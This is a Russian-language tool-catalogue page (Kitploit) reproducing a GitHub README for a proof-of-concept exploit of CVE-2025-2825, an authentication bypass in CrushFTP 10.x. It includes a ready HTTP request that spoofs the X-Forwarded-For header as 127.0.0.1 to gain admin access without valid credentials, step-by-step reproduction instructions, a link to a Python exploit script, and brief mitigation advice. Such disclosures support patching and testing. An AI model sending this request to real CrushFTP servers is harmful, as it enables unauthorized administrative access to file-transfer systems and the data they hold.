Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-2825-CrushFTP-AuthBypass — PoC обхода аутентификации для CVE-2025-2825 – эксплуатация CrushFTP 10.x | Kitploit
Инструменты/GitHubGitHub/shivshantp/cve-2025-2825-crushftp-authbypass
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеАутентификацияRed TeamingРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
shivshantp/cve-2025-2825-crushftp-authbypass

CVE-2025-2825-CrushFTP-AuthBypass

PoC обхода аутентификации для CVE-2025-2825 – эксплуатация CrushFTP 10.x

Репозиторий
511 год назадЕщё не проверено

CVE Exploit-Status

🚨 CVE-2025-2825 – Обход аутентификации CrushFTP

🔎 Обзор

CVE-2025-2825 — это критическая уязвимость обхода аутентификации, затрагивающая CrushFTP, широко используемый сервер безопасной передачи файлов. Уязвимость позволяет удалённым злоумышленникам обойти аутентификацию входа и получить административный доступ путём подделки заголовков — обманывая сервер, заставляя его думать, что запрос пришёл с localhost.

  • Серьёзность: Критическая
  • Оценка CVSS: 9.8
  • Вектор атаки: Удалённый
  • Затронутые версии: CrushFTP < v10.6.0
  • Исправлено в: v10.6.0 и выше
  • Статус: Активно эксплуатируется в дикой природе

🧠 Технические детали

Уязвимость возникает из-за неправильной проверки заголовка X-Forwarded-For. Когда этот заголовок установлен в 127.0.0.1, сервер обрабатывает запрос как локальный — обходя аутентификацию.


🧪 Доказательство концепции (PoC)

🔸 Пример HTTP-запроса:

root@kitploit:~
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1  
Host: target-ip  
X-Forwarded-For: 127.0.0.1

📝 Замените target-ip на фактический IP-адрес целевого сервера CrushFTP.

В случае успеха сервер обходит аутентификацию и предоставляет доступ — даже при неверных учётных данных.


🔗 Python-скрипт PoC

📄 cve-2025-2825-poc.py


🛠️ Используемые инструменты и технологии

  • Python – написание эксплойта
  • Burp Suite – перехват и изменение HTTP-заголовков
  • Wireshark – захват и анализ пакетов
  • Nmap – сканирование портов и перечисление служб
  • CrushFTP – уязвимый целевой экземпляр
  • GitHub – для публикации PoC и документации

📝 Шаги для воспроизведения

  1. Установите уязвимую версию CrushFTP (v10.5 или ранее).
  2. Перехватите запрос входа с помощью Burp Suite.
  3. Измените заголовок HTTP-запроса:
    root@kitploit:~
    X-Forwarded-For: 127.0.0.1
    
  4. Перешлите запрос.
  5. Административный доступ предоставляется без действительных учётных данных.

✅ Смягчение

  • Обновите CrushFTP до v10.6.0 или выше.
  • Очищайте и проверяйте заголовки, такие как X-Forwarded-For.
  • Ограничьте доступ администратора localhost или через VPN/брандмауэр.
  • Мониторьте логи на предмет подозрительных шаблонов доступа.

👨‍💻 Автор

Shivshant Patil
Сертифицированный этичный хакер (CEH v13)
Выпускник бакалавриата по компьютерной инженерии
🔗 LinkedIn Profile 🔗 Github Profile


📚 Ссылки

  • 🔗 Официальный бюллетень безопасности CrushFTP
  • 🔗 Запись NVD - CVE-2025-2825
  • 🔗 PacketStorm Security
Скачать инструмент